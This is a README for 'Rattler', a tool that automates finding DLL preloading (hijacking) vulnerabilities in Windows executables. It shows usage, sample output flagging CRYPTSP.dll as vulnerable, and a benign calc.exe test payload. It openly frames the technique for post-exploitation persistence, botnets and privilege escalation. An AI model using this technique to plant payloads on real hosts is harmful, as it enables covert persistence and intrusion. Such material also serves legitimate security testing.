# Automated DLL Enumerator: rattler

## Usage

Depending on the target executable location, Rattler may need to be run with elevated permissions.

ratter_32.exe “c:\path\to\target\application.exe” 1

• “c:\path\to\target\application.exe” =path to the executable you want to enumerate.
• 1 = Enumeration mode, only one at this point.
C:\Users\User\Desktop>Rattler_32.exe "C:\Users\User\Downloads\NDP462-KB3151800-x86-x64-AllOS-ENU.exe"  1
[+] RATTLER
[+] STARTING UP...
[*] TARGET PROCESS ID: 3504
[+] IMPLEMENTING EXECUTABLE TEST

[*] TARGETING DLL-> C:\Windows\SYSTEM32\CRYPTSP.dll
[*] INFO: DLL IS VULNERABLE TO EXECUTABLE TEST-> C:\Windows\SYSTEM32\CRYPTSP.dll

[*] TARGETING DLL-> C:\Windows\system32\rsaenh.dll
[*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST

[*] TARGETING DLL-> C:\Windows\SYSTEM32\ntmarta.dll
[*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST

[*] TARGETING DLL-> C:\Windows\SYSTEM32\feclient.dll
[*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST

[*] TARGETING DLL-> C:\Windows\system32\uxtheme.dll
[*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST

[*] TARGETING DLL-> C:\Windows\System32\MSCTF.dll
[*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST

[*] TARGETING DLL-> C:\Windows\system32\dwmapi.dll
[*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST

[+] EXECUTABLE TEST TOTAL DLL's IDENTIFIED: 43
[+] EXECUTABLE TEST TOTAL VULN COUNT: 1
[*] EXECUTABLE TEST VULNERABLE DLL-> C:\Windows\SYSTEM32\CRYPTSP.dll


## Information

Rattler was developed using C++ using Microsoft Visual Studio 2015. Rattler can be used to test 64 and 32 bit applications. Rattler’s default “payload” is a DLL (payload.dll) which invokes calc.exe. The default payload is 32bit. A 64bit payload can be used in conjunction with the 64bit executable to enumerate 64bit executables.

## Why do I use Rattler?

Rattler has made it quick and easy to identify a vector to get payloads executed. For example, if an application were to have ~100 DLL’s and if it took ~2 minutes to test each DLL, that is ~2 hours for a single application to be tested using a manual process. Additionally, the process for testing an application for DLL preloading vulnerabilities is rather simple and can be automated trivially using some C++, Windows API calls and fresh beard oil , hence Rattler.

Sure there are certain requirements to exploit DLL preloading vulnerabilities such as file access etc however the three most useful instances relate to post exploitation and they are, persistence, privilege escalation and RCE in some cases. When pwning a host, you may want persistence whether it’s to add to your botnet or merely pivot. One way to gain persistence is to exploit a DLL preloading vulnerability on the target host.

For example, if the target host has VoiceAndVideoApplicationX.exe installed and this executable is vulnerable to DLL preloading attacks then all I need to do is identify a vulnerable DLL using Rattler, drop my payload in the appropriate CWD and voila, every time the user/hosts runs VoiceAndVideoApplicationX.exe, my payload is executed as well.

Another useful tangent that Rattler can be used for is the elevation of privileges. One of the golden rules in pwning is that one tends to inherit the permissions of the exploited entity.